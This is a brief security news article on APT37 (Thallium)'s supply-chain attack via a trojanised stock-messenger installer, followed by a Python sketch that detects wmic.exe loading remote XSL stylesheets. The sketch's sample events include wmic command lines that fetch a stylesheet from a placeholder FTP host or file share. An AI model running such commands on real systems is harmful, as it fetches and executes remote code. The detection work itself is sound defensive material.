Thallium, the chemical element with atomic number 81, is a soft, silvery-white metal that is very poisonous.
The North Korean threat actor group APT37 is also known as Thallium. The group targeted a private stock investment messenger service in a software supply chain attack.
Their tactics and techniques consisted of a series of phishing attacks that used Microsoft Office documents to lure victims. Thallium also sent infected Windows installers and macro-laden Office documents.
They did this by producing a malicious code-infused Windows executable using Nullsoft Scriptable Install System (NSIS). It contained not only malicious code but also real files from the stock investment application.
Within the real installer, the threat actors implemented specific commands that retrieved a malicious XSL script from a rogue FTP server and executed it on Windows systems through the built-in wmic.exe utility.
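For defenders, the wmic.exe step described above is the part most visible in process-creation logs. The following is an added detection sketch, not code from the original article or from any vendor report; it assumes the stylesheet is passed through wmic's `/format:` switch (the article does not give the exact command line), and the events and host names in it are constructed placeholders.

```python
import ntpath
import re

# wmic takes an output stylesheet through its /format: switch. Built-in names
# (csv, list, table ...) are local keywords, so a URL or UNC path stands out.
FORMAT_RE = re.compile(r"/format\s*:\s*(?:\"([^\"]+)\"|'([^']+)'|(\S+))", re.I)
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|\\\\)", re.I)


def classify(image, command_line):
    """Return (severity, stylesheet) for one process-creation event, or None."""
    if ntpath.basename(image).lower() != "wmic.exe":
        return None
    match = FORMAT_RE.search(command_line)
    if not match:
        return None
    target = next(g for g in match.groups() if g)
    if REMOTE_RE.match(target):
        return ("high", target)      # stylesheet pulled from ftp://, http://, \\host ...
    if target.lower().endswith((".xsl", ".xslt")):
        return ("medium", target)    # custom stylesheet file on local disk
    return None                      # built-in format keyword


def detect(events):
    """Run classify() over (image, command_line) tuples; keep the hits."""
    hits = []
    for index, (image, command_line) in enumerate(events):
        verdict = classify(image, command_line)
        if verdict:
            hits.append((index, *verdict))
    return hits


# Constructed sample events (assumption: fields exported from process-creation
# logging such as Sysmon Event ID 1). Hosts and file names are placeholders.
WMIC = "C:\\Windows\\System32\\wbem\\WMIC.exe"
EVENTS = [
    (WMIC, 'wmic os get /format:"ftp://files.example.invalid/update.xsl"'),
    (WMIC, "wmic process list /FORMAT:csv"),
    (WMIC, r"wmic os get /format:C:\Users\Public\report.xsl"),
    ("C:\\Windows\\System32\\cmd.exe", "cmd /c echo /format:ftp://x"),
    (WMIC, r"wmic os get /format:\\fileserver\share\s.xsl"),
]

if __name__ == "__main__":
    for index, severity, target in detect(EVENTS):
        print(f"event {index}: {severity} - wmic stylesheet {target}")
```

Matching on the image basename means a renamed copy of wmic.exe would be missed; pairing this with the binary's original file name from the log source closes that gap.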
Another supply chain attack is a cause for concern, given what has happened recently in the SolarWinds breach. The trail of connections to the specific victims opens up many lanes for threat actors to infiltrate.